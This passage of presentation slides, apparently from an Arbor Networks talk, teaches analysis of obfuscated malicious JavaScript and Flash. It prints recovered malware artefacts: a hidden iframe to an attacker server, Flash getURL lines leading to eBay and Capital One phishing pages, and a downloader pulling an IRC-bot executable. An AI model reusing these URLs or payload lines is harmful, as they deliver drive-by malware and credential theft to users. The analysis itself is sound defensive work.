  • 40. Making Sneaky Work Prepend a working document object (my basic document object doesn’t work with SpiderMonkey) function my_document () { // a property (initialized to string) this.m_property=quot;quot;; this.write=function(string) { print(quot;my_document::writequot;); print(string); } }; // declare a globally-accessible document object var document=new my_document(); From http://www.websense.com/securitylabs/blog/blog.php?BlogID=98 arbornetworks.com Page 40 Company Confidential
  • 41. Run it Through SpiderMonkey $ cat jose.html | ./js my_document::write </textarea><iframe src=quot;http://ibm- ssl.com:81/cgi-bin/nsp.cgi?p=buyquot; width=1 height=1 style=quot;border: 0pxquot;></iframe> • Notice the close textarea tag • Code also will barf on alert() • Notice that the decode array expected the full decode function • Cannot mess with it via print() or alert()! arbornetworks.com Page 41 Company Confidential
  • 42. Sometimes We Need Other Tools • Sometimes NJS js(1) will barf on some character codes • What do we do? We call out to another language • I like Python so … • s = <array of numbers as a Python tuple> • … for i in s: r += chr(s) … arbornetworks.com Page 42 Company Confidential
  • 43. Malicious JScript in the Large • NeoSploit • Similar to Web Attacker framework • Lots of exploits • Enumerates vulnerable components – Web browser – Accessible CLSIDs – At least 7 different exploits • Fingerprints you quickly • Launches the right exploit arbornetworks.com Page 43 Company Confidential
  • 44. Where We See This Stuff Day to Day • Feebs worm – Convoluted JavaScript body drops a VBScript malware reassembler • ADODB.Stream() exploits – Usually grab a first stage EXE • Other ActiveX exploits – Often mutliple CLSIDs stacked in one malicious web page arbornetworks.com Page 44 Company Confidential
  • 45. Tools and Tips • curl(1) and wget(1) are your friend – Learn how to set your own Referrer and User-Agent fields • Don’t use a vulnerable browser when you’re doing this work • tee(1) or script(1) most of your cmdline work • My favorite platforms: UNIX, OS X arbornetworks.com Page 45 Company Confidential
  • 46. Unsolved Problems • No complement to js(1) for VBScript … anyone? – Suggestion: WINE with cscript.exe • RELIABLE generic detection – IDS, IPS sigs – Browser plugins • Non-browser based honeyclients don’t understand JS – Bolt in SpiderMonkey C bindings? arbornetworks.com Page 46 Company Confidential
  • 47. Bonus Material: Flash Malware • Flash can contain JavaScript actions within • These JavaScript actions can affect the browser • Tool of choice: Flasm – Flasm is a free command line assembler/disassembler of Flash ActionScript bytecode. – http://flasm.sourceforge.net/ arbornetworks.com Page 47 Company Confidential
  • 48. Phlash Redirection Real Example from December 10, 2006 http://i127.photobucket.com/albums/p126/click2es/prize.swf $ flasm -d /home/jose/malware/10dec06/i127.photobucket.com/albums/p126/c lick2es/prize.swf Flasm configuration file flasm.ini not found, using default values movie '/home/jose/ … /prize.swf' compressed // flash 6, total frames: 1, frame rate: 12 fps, 50x40 px frame 0 getURL 'http://www.fair- faxy.com/Signin.eBay.com.ws.eBayISAPI.dslSignInco.partnerId.p UserId.siteid.pageType.pa1.i1.BshowGif.UsingSSL.https.ebay.co m.pa2.errmsg.runame.ruparams.ruproduct.sid.confirm5.htm' '_self' end // of frame 0 end arbornetworks.com Page 48 Company Confidential
  • 49. Flash Exploit Downloader 22:45:30 < dfx> http://hiltonfreak.tripod.com/parishilton.swf frame 156 Downloads IRC Bot getURL 'javaplugin.zip' '_top' end // of frame 156 Archive: hiltonfreak.tripod.com/javaplugin.zip Length Date Time Name -------- ---- ---- ---- 13624 04-13-07 22:13 readme.txt 60960 04-13-07 21:44 javaplugin.exe -------- ------- arbornetworks.com Page 49 Company Confidential
  • 50. Phishing in Flash • Call out to web components to build what appears to be a legit site • All run within a Flash object • Intercept data, process and steal • Huge decodes, but Flasm shows how it’s done arbornetworks.com Page 50 Company Confidential
  • 51. Phlash Phishing 19 March 2007: http://200.29.161.100/1/capital2.swf … defineButton 164 on overDownToOverUp getURL 'http://www.capitalone.com/' '_blank' end end // of defineButton 164 defineButton 165 on overDownToOverUp getURL 'http://www.capitalone.com/legal/privacy.php' '_blank' end end // of defineButton 165 … arbornetworks.com Page 51 Company Confidential
  • 52. Back to JavaScript • The bad guys are using JavaScript as their delivery vehicle • JavaScript: Learn it, love it • They’re limited by the fact that the JavaScript has to be decoded to be used by the browser • Their obfuscation tools are primitive but effective – But they require a human to analyze • They’ll continue to push the envelope – Malware2.0? arbornetworks.com Page 52 Company Confidential
  • 53. Thank You Acknowledgements • A (wishes to remain anonymous) • Websense guys • Ken Dunham @ iDef • Joe Stewart @ SecureWorx • You arbornetworks.com Page 53 Company Confidential